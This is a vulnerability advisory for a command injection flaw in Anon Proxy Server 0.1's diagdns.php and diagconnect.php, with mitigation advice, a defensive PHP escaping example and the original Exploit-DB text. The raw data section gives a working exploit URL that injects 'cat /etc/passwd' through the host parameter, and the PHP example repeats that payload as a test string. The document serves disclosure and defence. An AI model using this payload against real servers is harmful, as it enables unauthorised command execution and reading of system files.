Vendor: Anon Proxy Server
By: Michael Brooks
CVSS: 7.5 HIGH
Multiple Remote System commands execution
CWE: 78
Product Name: Anon Proxy Server
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE:
CPE: a:anon_proxy_server:anon_proxy_server:0.100
Metasploit:
Other Scripts:
Platforms Tested:
2007

Multiple Remote System commands execution in Anon Proxy Server

A flaw exists in diagdns.php in Anon Proxy Server which allows remote attackers to execute arbitrary commands via a crafted request. A virtually identical flaw also exists in diagconnect.php, but it takes longer to execute.

Mitigation:

The best temporary solution is to remove diagdns.php and diagconnect.php. Additionally, using the escapeshellarg() function can provide protection against this vulnerability. Anon Proxy Server will also need to revamp its security, as magic_quotes_gpc is being removed in PHP 6.
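
An added example (not code from the original advisory or from Anon Proxy Server) of the mitigation described above: it shows why the addslashes-style escaping done by magic_quotes_gpc does not make a value safe for system(), while escapeshellarg() combined with a hostname allowlist does. The nslookup command line and the function names are assumptions, and no command is executed.

```php
<?php
// Added example. The real diagdns.php source is not shown on this page, so
// the nslookup command line below is an assumption.

// magic_quotes_gpc applied the same escaping as addslashes() to request data.
function magic_quotes_view(string $raw): string
{
    return addslashes($raw);
}

// Allowlist for a DNS hostname: dot-separated labels of letters, digits and
// hyphens, no label starting or ending with a hyphen, 253 characters at most.
function is_valid_hostname(string $host): bool
{
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($host) <= 253
        && preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $host) === 1;
}

// Hardened command builder: reject anything that is not a hostname, then
// quote the value for the shell. Returns null when the input is rejected.
function build_lookup_command(string $host): ?string
{
    if (!is_valid_hostname($host)) {
        return null;
    }
    return 'nslookup ' . escapeshellarg($host);
}

// Decoded host parameter from the example request on this page.
$tainted = "google.com\\' && cat /etc/passwd #";

// addslashes() only inserts backslashes; the quote and && are still present,
// and a backslash has no special meaning to the shell inside single quotes.
echo "magic_quotes  : nslookup '" . magic_quotes_view($tainted) . "'\n";

// escapeshellarg() keeps the whole value inside a single shell word.
echo "escapeshellarg: nslookup " . escapeshellarg($tainted) . "\n";

// The allowlist rejects the value before any command is built.
var_dump(build_lookup_command($tainted));
var_dump(build_lookup_command('example.com'));
```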

Exploit-DB raw data:

By Michael Brooks
Vulnerability type: Multiple Remote System commands execution.
Software: Anon Proxy Server
Home page: http://sourceforge.net/projects/anonproxyserver/
Affects version: 0.100

Example exploit:
http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23

A virtually identical flaw exists in diagconnect.php; however, it takes longer to execute.

Anon Proxy Server forces magic_quotes_gpc=on. However, magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also, magic_quotes_gpc is being removed in PHP 6, so Anon Proxy Server will have to revamp their security.

Peace

# milw0rm.com [2007-12-14]